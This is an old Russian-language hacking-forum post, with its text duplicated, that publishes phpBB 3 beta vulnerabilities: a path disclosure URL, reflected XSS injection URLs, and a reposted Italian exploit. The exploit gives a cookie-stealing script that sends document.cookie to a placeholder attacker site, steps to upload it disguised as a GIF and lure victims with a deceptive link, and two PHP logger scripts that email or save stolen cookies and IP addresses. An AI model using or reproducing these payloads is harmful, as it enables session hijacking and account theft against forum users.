_kREveDKo_
07.10.2006, 23:18
Воть за небольшой промежуток времени нашёл в третьей ветке phpBB нымножко XSS. Всё примитивно
и бонально, поэтому выкладываю сразу в паблиг, т.к. сильной ценности не представляет.
Раскрытие пути
http://localhost/phpbb3/includes/constants.php
Пассивчег
http://localhost/phpbb3/memberlist.php?mode=group&g=">[_Your-code_]<hr bebe="
http://localhost/phpbb3/memberlist.php?mode=">[_Your-code_]<hr bebe="
Полу-активчег
К сожалению к тому моменту как мне припёрло писать этот пост, я вспомнил что тоха давал какойто
сплойт-хсс на этот форум. Тогда я не придал этому значения, ибо искал более серъёзные вещи чем
хсс, а теперь когда посмотрел что он мне там давал, я понел, что зря тока угробил время - багу
нашли до меня =(. Воть вам сорец сплойта, переводите сами, ибо я в печали.
__________________________________________________ _______________________
/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ Hacking Security *
| | >< | |
\ \ / /
'.__.'
Exploit: Xss phpBB 3.0
Author: SpiderZ
Sito: www.spiderz.altervista.org
Sito2: www.spiderz.netsons.org
__________________________________________________ _______________________
Download: http://www.phpbb.it/download/phpBB-3.0.B1.zip
__________________________________________________ _______________________
Apri un editor di testo come il "blocco note"
inserisci il seguente script
<script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>
salva il file in img.gif ( . GIF )
Quando stai per postare, vai in basso su : "Attachment uploading"
inserisci la tua immagine.
Adesso in basso trovi "Posted attachments" e sotto ad esso la tua immagine inserita es: ciao.gif
adesso prendi il link diretto della img. es: http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif
Ora non rimane che camuffare il link
Esempio: [*url=http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif]Bella ragazza[/*url]
Adesso tutti coloro che usano Internet explorer come browser, e visiteranno il tuo link...
riceverai il loro cookie.
Log cookie ( File.php )
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$cookie = $_GET['c'];
$myemail = "LA TUA E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss phpBB 3" ;
$message = "Xss phpBB 3 Powered by Sfs (c) 2006
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
**************************************
Modifica : $myemail = "LA TUA E-MAIL";
es: tua@mail.com
**************************************
Log cookie Alternativo ( File.php )
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Стёб
В бб-тегах нарушения синтаксиса можно добиться так:
[*url]http:// :!: yandex.ru[/*url]
Ценности не имеет, т.к. управлять урлом смайла мы не имеем возможности.
З.Ы. В процессе поиска багов как всегда использовался только моск - по багтракам не бегал.
Grey: тема закрыта.
и бонально, поэтому выкладываю сразу в паблиг, т.к. сильной ценности не представляет.
Раскрытие пути
http://localhost/phpbb3/includes/constants.php
Пассивчег
http://localhost/phpbb3/memberlist.php?mode=group&g=">[_Your-code_]<hr bebe="
http://localhost/phpbb3/memberlist.php?mode=">[_Your-code_]<hr bebe="
Полу-активчег
К сожалению к тому моменту как мне припёрло писать этот пост, я вспомнил что тоха давал какойто
сплойт-хсс на этот форум. Тогда я не придал этому значения, ибо искал более серъёзные вещи чем
хсс, а теперь когда посмотрел что он мне там давал, я понел, что зря тока угробил время - багу
нашли до меня =(. Воть вам сорец сплойта, переводите сами, ибо я в печали.
__________________________________________________ _______________________
/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ Hacking Security *
| | >< | |
\ \ / /
'.__.'
Exploit: Xss phpBB 3.0
Author: SpiderZ
Sito: www.spiderz.altervista.org
Sito2: www.spiderz.netsons.org
__________________________________________________ _______________________
Download: http://www.phpbb.it/download/phpBB-3.0.B1.zip
__________________________________________________ _______________________
Apri un editor di testo come il "blocco note"
inserisci il seguente script
<script>document.location.replace('http://WWW.SITOWEB/FILE.php?c='+document.cookie);</script>
salva il file in img.gif ( . GIF )
Quando stai per postare, vai in basso su : "Attachment uploading"
inserisci la tua immagine.
Adesso in basso trovi "Posted attachments" e sotto ad esso la tua immagine inserita es: ciao.gif
adesso prendi il link diretto della img. es: http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif
Ora non rimane che camuffare il link
Esempio: [*url=http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif]Bella ragazza[/*url]
Adesso tutti coloro che usano Internet explorer come browser, e visiteranno il tuo link...
riceverai il loro cookie.
Log cookie ( File.php )
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$accept=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$cookie = $_GET['c'];
$myemail = "LA TUA E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss phpBB 3" ;
$message = "Xss phpBB 3 Powered by Sfs (c) 2006
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Lingua: $accept
Url: $base
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
**************************************
Modifica : $myemail = "LA TUA E-MAIL";
es: tua@mail.com
**************************************
Log cookie Alternativo ( File.php )
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Стёб
В бб-тегах нарушения синтаксиса можно добиться так:
[*url]http:// :!: yandex.ru[/*url]
Ценности не имеет, т.к. управлять урлом смайла мы не имеем возможности.
З.Ы. В процессе поиска багов как всегда использовался только моск - по багтракам не бегал.
Grey: тема закрыта.